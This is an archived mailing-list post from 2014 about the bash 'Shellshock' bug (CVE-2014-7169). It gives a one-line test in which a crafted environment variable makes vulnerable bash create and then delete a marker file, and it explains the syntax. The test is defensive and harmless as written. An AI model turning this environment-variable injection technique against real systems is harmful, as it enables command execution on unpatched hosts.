[PLUG] ALL BASH RELEASES STILL VULNERABLE [Re: cross-platform bash vulnerability widespread]

Micah Cowan micah at addictivecode.org
Thu Sep 25 20:44:42 UTC 2014

At least one person had different (but still rather wrong-looking) results
for that example (which is the one from CVE-2014-7169's cited links); I've
seen another one being passed around with a moderately different syntax, so
give it a try too:

V='() { function a a>\' bash -c 'iam-vulnerable';ls iam-vulnerable;rm -f
iam-vulnerable

(if it's not clear, the backslash there is a literal backslash, they don't
quote things in single-quote-mode. Also, despite the fact that the word
"env" is missing from the example, be assured it is setting V in the
environment. "VAR=foo cmd..." is a portable sh way to set cmd's env just
prior to executing it (without affecting anything in the outer/interactive
shell).)

-mjc